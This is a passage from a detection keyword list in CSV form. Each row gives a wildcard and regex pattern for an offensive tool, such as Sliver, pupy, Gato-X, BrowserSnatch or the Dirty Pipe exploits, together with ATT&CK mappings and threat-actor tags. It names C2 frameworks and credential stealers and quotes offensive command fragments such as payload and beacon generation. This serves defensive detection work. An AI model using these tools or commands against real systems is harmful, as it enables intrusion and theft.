- GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","45497"
"*gather/peass.rb*",".{0,1000}gather\/peass\.rb.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","45498"
"*gather/user_hunter*",".{0,1000}gather\/user_hunter.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","45499"
"*gatherer/gatherer.py*",".{0,1000}gatherer\/gatherer\.py.{0,1000}","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passowrds/users.","T1087 - T1482 - T1201 - T1213 - T1003","TA0007 - TA0008 - TA0009 - TA0006","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","1","N/A","N/A","N/A","6","576","89","2025-03-15T13:37:50Z","2019-03-27T18:36:41Z","45500"
"*gato * attack*",".{0,1000}gato\s.{0,1000}\sattack.{0,1000}","offensive_tool_keyword","gato","GitHub Self-Hosted Runner Enumeration and Attack Tool","T1083 - T1087 - T1081","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/praetorian-inc/gato","1","0","N/A","N/A","N/A","7","630","55","2025-04-10T23:25:04Z","2023-01-06T15:43:27Z","45501"
"*gato * enumerate*",".{0,1000}gato\s.{0,1000}\senumerate.{0,1000}","offensive_tool_keyword","gato","GitHub Self-Hosted Runner Enumeration and Attack Tool","T1083 - T1087 - T1081","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/praetorian-inc/gato","1","0","N/A","N/A","N/A","7","630","55","2025-04-10T23:25:04Z","2023-01-06T15:43:27Z","45502"
"*gato * --http-proxy*",".{0,1000}gato\s.{0,1000}\s\-\-http\-proxy.{0,1000}","offensive_tool_keyword","gato","GitHub Self-Hosted Runner Enumeration and Attack Tool","T1083 - T1087 - T1081","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/praetorian-inc/gato","1","0","N/A","N/A","N/A","7","630","55","2025-04-10T23:25:04Z","2023-01-06T15:43:27Z","45503"
"*gato * --socks-proxy*",".{0,1000}gato\s.{0,1000}\s\-\-socks\-proxy.{0,1000}","offensive_tool_keyword","gato","GitHub Self-Hosted Runner Enumeration and Attack Tool","T1083 - T1087 - T1081","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/praetorian-inc/gato","1","0","N/A","N/A","N/A","7","630","55","2025-04-10T23:25:04Z","2023-01-06T15:43:27Z","45504"
"*gato_x-0.5.3-py3-none-any.whl*",".{0,1000}gato_x\-0\.5\.3\-py3\-none\-any\.whl.{0,1000}","offensive_tool_keyword","Gato-X","automate advanced enumeration and exploitation techniques against GitHub repositories and organizations","T1190 - T1083 - T1588 - T1587","TA0001 - TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/adnanekhan/Gato-X","1","1","N/A","N/A","7","3","270","35","2025-04-21T17:57:09Z","2024-01-27T18:55:16Z","45505"
"*gato-x attack *",".{0,1000}gato\-x\sattack\s.{0,1000}","offensive_tool_keyword","Gato-X","automate advanced enumeration and exploitation techniques against GitHub repositories and organizations","T1190 - T1083 - T1588 - T1587","TA0001 - TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/adnanekhan/Gato-X","1","0","N/A","N/A","7","3","270","35","2025-04-21T17:57:09Z","2024-01-27T18:55:16Z","45506"
"*gato-x enum *",".{0,1000}gato\-x\senum\s.{0,1000}","offensive_tool_keyword","Gato-X","automate advanced enumeration and exploitation techniques against GitHub repositories and organizations","T1190 - T1083 - T1588 - T1587","TA0001 - TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/adnanekhan/Gato-X","1","0","N/A","N/A","7","3","270","35","2025-04-21T17:57:09Z","2024-01-27T18:55:16Z","45507"
"*gato-x search *",".{0,1000}gato\-x\ssearch\s.{0,1000}","offensive_tool_keyword","Gato-X","automate advanced enumeration and exploitation techniques against GitHub repositories and organizations","T1190 - T1083 - T1588 - T1587","TA0001 - TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/adnanekhan/Gato-X","1","0","N/A","N/A","7","3","270","35","2025-04-21T17:57:09Z","2024-01-27T18:55:16Z","45508"
"*gatox.cli.search*",".{0,1000}gatox\.cli\.search.{0,1000}","offensive_tool_keyword","Gato-X","automate advanced enumeration and exploitation techniques against GitHub repositories and organizations","T1190 - T1083 - T1588 - T1587","TA0001 - TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/adnanekhan/Gato-X","1","0","N/A","N/A","7","3","270","35","2025-04-21T17:57:09Z","2024-01-27T18:55:16Z","45509"
"*gatox.enumerate.reports.report*",".{0,1000}gatox\.enumerate\.reports\.report.{0,1000}","offensive_tool_keyword","Gato-X","automate advanced enumeration and exploitation techniques against GitHub repositories and organizations","T1190 - T1083 - T1588 - T1587","TA0001 - TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/adnanekhan/Gato-X","1","0","N/A","N/A","7","3","270","35","2025-04-21T17:57:09Z","2024-01-27T18:55:16Z","45510"
"*gatox.git.utils.subprocess.run*",".{0,1000}gatox\.git\.utils\.subprocess\.run.{0,1000}","offensive_tool_keyword","Gato-X","automate advanced enumeration and exploitation techniques against GitHub repositories and organizations","T1190 - T1083 - T1588 - T1587","TA0001 - TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/adnanekhan/Gato-X","1","0","N/A","N/A","7","3","270","35","2025-04-21T17:57:09Z","2024-01-27T18:55:16Z","45511"
"*gatox.github.api.open*",".{0,1000}gatox\.github\.api\.open.{0,1000}","offensive_tool_keyword","Gato-X","automate advanced enumeration and exploitation techniques against GitHub repositories and organizations","T1190 - T1083 - T1588 - T1587","TA0001 - TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/adnanekhan/Gato-X","1","0","N/A","N/A","7","3","270","35","2025-04-21T17:57:09Z","2024-01-27T18:55:16Z","45512"
"*gatox.github.api.requests.post*",".{0,1000}gatox\.github\.api\.requests\.post.{0,1000}","offensive_tool_keyword","Gato-X","automate advanced enumeration and exploitation techniques against GitHub repositories and organizations","T1190 - T1083 - T1588 - T1587","TA0001 - TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/adnanekhan/Gato-X","1","0","N/A","N/A","7","3","270","35","2025-04-21T17:57:09Z","2024-01-27T18:55:16Z","45513"
"*gatox.github.search*",".{0,1000}gatox\.github\.search.{0,1000}","offensive_tool_keyword","Gato-X","automate advanced enumeration and exploitation techniques against GitHub repositories and organizations","T1190 - T1083 - T1588 - T1587","TA0001 - TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/adnanekhan/Gato-X","1","0","N/A","N/A","7","3","270","35","2025-04-21T17:57:09Z","2024-01-27T18:55:16Z","45514"
"*gc2-sheet.go*",".{0,1000}gc2\-sheet\.go.{0,1000}","offensive_tool_keyword","GC2-sheet","GC2 is a Command and Control application that allows an attacker to execute commands on the target machine using Google Sheet and exfiltrate data using Google Drive.","T1071.002 - T1560 - T1105","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/looCiprian/GC2-sheet","1","1","N/A","N/A","10","10","578","111","2025-03-28T19:48:36Z","2021-09-15T19:06:12Z","45517"
"*GC2-sheet/cmd*",".{0,1000}GC2\-sheet\/cmd.{0,1000}","offensive_tool_keyword","GC2-sheet","GC2 is a Command and Control application that allows an attacker to execute commands on the target machine using Google Sheet and exfiltrate data using Google Drive.","T1071.002 - T1560 - T1105","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/looCiprian/GC2-sheet","1","1","N/A","N/A","10","10","578","111","2025-03-28T19:48:36Z","2021-09-15T19:06:12Z","45518"
"*gcat*implant.py*",".{0,1000}gcat.{0,1000}implant\.py.{0,1000}","offensive_tool_keyword","gcat","A PoC backdoor that uses Gmail as a C&C server","T1071.001 - T1094 - T1102.002","TA0011 - TA0010 - TA0008","N/A","Sandworm","C2","https://github.com/byt3bl33d3r/gcat","1","1","N/A","N/A","10","10","1332","425","2018-11-16T13:43:15Z","2015-06-03T01:28:00Z","45519"
"*gcat.is.the.shit@gmail.com*",".{0,1000}gcat\.is\.the\.shit\@gmail\.com.{0,1000}","offensive_tool_keyword","gcat","A PoC backdoor that uses Gmail as a C&C server","T1071.001 - T1094 - T1102.002","TA0011 - TA0010 - TA0008","N/A","Sandworm","C2","https://github.com/byt3bl33d3r/gcat","1","0","#email","N/A","10","10","1332","425","2018-11-16T13:43:15Z","2015-06-03T01:28:00Z","45520"
"*gcc cve_2022_0847.c -o exploit*",".{0,1000}gcc\scve_2022_0847\.c\s\-o\sexploit.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1204 - T1055 - T1003 - T1015 - T1068 - T1059 - T1047","TA0001 - TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tool","https://github.com/ahrixia/CVE_2022_0847","1","0","N/A","N/A","N/A","1","21","15","2022-03-08T13:15:35Z","2022-03-08T12:43:43Z","45521"
"*gcc dirtypipez.c*",".{0,1000}gcc\sdirtypipez\.c.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1533","TA0003","N/A","N/A","Exploitation tool","https://github.com/febinrev/dirtypipez-exploit","1","0","N/A","N/A","N/A","1","51","22","2022-03-08T11:52:22Z","2022-03-08T11:49:40Z","45522"
"*gcc exploit-1.c -o exploit-1*",".{0,1000}gcc\sexploit\-1\.c\s\-o\sexploit\-1.{0,1000}","offensive_tool_keyword","POC","exploit the Linux Dirty Pipe vulnerability","T1068 - T1078.003 - T1071.004 - T1072 - T1105","TA0004 - TA0006?","N/A","N/A","Privilege Escalation","https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits","1","0","N/A","N/A","10","6","595","148","2023-05-20T05:55:45Z","2022-03-12T20:57:24Z","45523"
"*gcc exploit-2.c -o exploit-2*",".{0,1000}gcc\sexploit\-2\.c\s\-o\sexploit\-2.{0,1000}","offensive_tool_keyword","POC","exploit the Linux Dirty Pipe vulnerability","T1068 - T1078.003 - T1071.004 - T1072 - T1105","TA0004 - TA0006?","N/A","N/A","Privilege Escalation","https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits","1","0","#linux","N/A","10","6","595","148","2023-05-20T05:55:45Z","2022-03-12T20:57:24Z","45524"
"*gconv-modules*",".{0,1000}gconv\-modules.{0,1000}","offensive_tool_keyword","POC","Exploit for the pwnkit vulnerability (https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt) from the Qualys team","T1068","TA0004","N/A","N/A","Exploitation tool","https://github.com/Ayrx/CVE-2021-4034","1","0","N/A","N/A","N/A","1","93","14","2022-01-27T11:57:05Z","2022-01-26T03:33:47Z","45528"
"*gcp_functionalc2.profile*",".{0,1000}gcp_functionalc2\.profile.{0,1000}","offensive_tool_keyword","FunctionalC2","A small POC of using Azure Functions to relay communications","T1021.006 - T1132.002 - T1071.001","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/FortyNorthSecurity/FunctionalC2","1","1","N/A","N/A","10","10","74","17","2023-03-30T20:27:38Z","2020-03-12T17:54:50Z","45529"
"*GCPBucketBrute*",".{0,1000}GCPBucketBrute.{0,1000}","offensive_tool_keyword","GCPBucketBrute","A script to enumerate Google Storage buckets. determine what access you have to them. and determine if they can be privilege escalated","T1083 - T1553 - T1210 - T1213","TA0001 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/RhinoSecurityLabs/GCPBucketBrute","1","0","N/A","N/A","N/A","6","516","86","2023-05-26T19:11:42Z","2019-02-26T03:56:22Z","45530"
"*GCR - Google Calendar RAT*",".{0,1000}GCR\s\-\sGoogle\sCalendar\sRAT.{0,1000}","offensive_tool_keyword","GCR-Google-Calendar-RAT","Google Calendar RAT is a PoC of Command&Control over Google Calendar Events","T1071.001 - T1021.002 - T1059","TA0002 - TA0005","N/A","N/A","C2","https://github.com/MrSaighnal/GCR-Google-Calendar-RAT","1","0","N/A","N/A","10","10","215","41","2024-04-11T18:06:02Z","2023-06-18T13:23:31Z","45531"
"*GCR-Google-Calendar-RAT*",".{0,1000}GCR\-Google\-Calendar\-RAT.{0,1000}","offensive_tool_keyword","GCR-Google-Calendar-RAT","Google Calendar RAT is a PoC of Command&Control over Google Calendar Events","T1071.001 - T1021.002 - T1059","TA0002 - TA0005","N/A","N/A","C2","https://github.com/MrSaighnal/GCR-Google-Calendar-RAT","1","1","N/A","N/A","10","10","215","41","2024-04-11T18:06:02Z","2023-06-18T13:23:31Z","45532"
"*GDSSecurity/PSAttack*",".{0,1000}GDSSecurity\/PSAttack.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","1","N/A","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","45534"
"*geacon*/cmd/*",".{0,1000}geacon.{0,1000}\/cmd\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/darkr4y/geacon","1","1","N/A","N/A","10","10","1189","206","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z","45535"
"*Gecko Bookmarks Snatch Failed*",".{0,1000}Gecko\sBookmarks\sSnatch\sFailed.{0,1000}","offensive_tool_keyword","BrowserSnatch","steals important data from all chromium and gecko browsers installed in the system and gather the data in a stealer db to be exfiltrated out. A powerful Browser Stealer","T1081 - T1074 - T1114 - T1005 - T1041 - T1027","TA0006 - TA0009 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/shaddy43/BrowserSnatch","1","0","#content","N/A","10","3","246","39","2025-03-31T21:04:30Z","2024-08-26T18:38:42Z","45536"
"*Gecko Cookie Snatch Failed*",".{0,1000}Gecko\sCookie\sSnatch\sFailed.{0,1000}","offensive_tool_keyword","BrowserSnatch","steals important data from all chromium and gecko browsers installed in the system and gather the data in a stealer db to be exfiltrated out. A powerful Browser Stealer","T1081 - T1074 - T1114 - T1005 - T1041 - T1027","TA0006 - TA0009 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/shaddy43/BrowserSnatch","1","0","#content","N/A","10","3","246","39","2025-03-31T21:04:30Z","2024-08-26T18:38:42Z","45537"
"*Gecko History Snatch Failed*",".{0,1000}Gecko\sHistory\sSnatch\sFailed.{0,1000}","offensive_tool_keyword","BrowserSnatch","steals important data from all chromium and gecko browsers installed in the system and gather the data in a stealer db to be exfiltrated out. A powerful Browser Stealer","T1081 - T1074 - T1114 - T1005 - T1041 - T1027","TA0006 - TA0009 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/shaddy43/BrowserSnatch","1","0","#content","N/A","10","3","246","39","2025-03-31T21:04:30Z","2024-08-26T18:38:42Z","45538"
"*Gecko Password Snatch Failed*",".{0,1000}Gecko\sPassword\sSnatch\sFailed.{0,1000}","offensive_tool_keyword","BrowserSnatch","steals important data from all chromium and gecko browsers installed in the system and gather the data in a stealer db to be exfiltrated out. A powerful Browser Stealer","T1081 - T1074 - T1114 - T1005 - T1041 - T1027","TA0006 - TA0009 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/shaddy43/BrowserSnatch","1","0","#content","N/A","10","3","246","39","2025-03-31T21:04:30Z","2024-08-26T18:38:42Z","45539"
"*geli2john.py*",".{0,1000}geli2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","45540"
"*gem 'evil-proxy'*",".{0,1000}gem\s\'evil\-proxy\'.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","N/A","9","2","172","96","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z","45541"
"*gemailhack.py*",".{0,1000}gemailhack\.py.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/Ha3MrX/Gemail-Hack","1","1","N/A","N/A","7","10","1062","400","2024-01-17T15:12:44Z","2018-04-19T13:48:41Z","45542"
"*gen -f py bind --port*",".{0,1000}gen\s\-f\spy\sbind\s\-\-port.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","45543"
"*gen -f py_oneliner connect *",".{0,1000}gen\s\-f\spy_oneliner\sconnect\s.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","45544"
"*genCrossC2 *",".{0,1000}genCrossC2\s.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","0","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","45546"
"*genCrossC2.*",".{0,1000}genCrossC2\..{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","45547"
"*genCrossC2.Win.exe*",".{0,1000}genCrossC2\.Win\.exe.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","45548"
"*Generador de Payloads FUD by Black$hell256*",".{0,1000}Generador\sde\sPayloads\sFUD\sby\sBlack\$hell256.{0,1000}","offensive_tool_keyword","ShellPwnsh","Reverse Shell in Golang and PowerShell Fud","T1059.001 - T1573.002 - T1105","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/BlackShell256/ShellPwnsh","1","0","#content","N/A","9","10","9","6","2022-05-01T08:42:54Z","2022-04-28T01:26:08Z","45549"
"*Generalrecon -noninteractive*",".{0,1000}Generalrecon\s\-noninteractive.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","45550"
"*generate beacon --http *.onion --proxy *",".{0,1000}generate\sbeacon\s\-\-http\s.{0,1000}\.onion\s\-\-proxy\s.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","45551"
"*generate beacon --mtls *",".{0,1000}generate\sbeacon\s\-\-mtls\s.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","45552"
"*generate exe Shadow*",".{0,1000}generate\sexe\sShadow.{0,1000}","offensive_tool_keyword","ShadowForgeC2","ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.","T1071.001 - T1569.002 - T1059.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/0xEr3bus/ShadowForgeC2","1","0","N/A","N/A","10","10","47","7","2023-07-15T11:45:36Z","2023-07-13T11:49:36Z","45553"
"*generate --http http*",".{0,1000}generate\s\-\-http\shttp.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","45554"
"*generate --mtls * --os windows *",".{0,1000}generate\s\-\-mtls\s.{0,1000}\s\-\-os\swindows\s.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","45555"
"*generate --mtls * --save *",".{0,1000}generate\s\-\-mtls\s.{0,1000}\s\-\-save\s.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","45556"
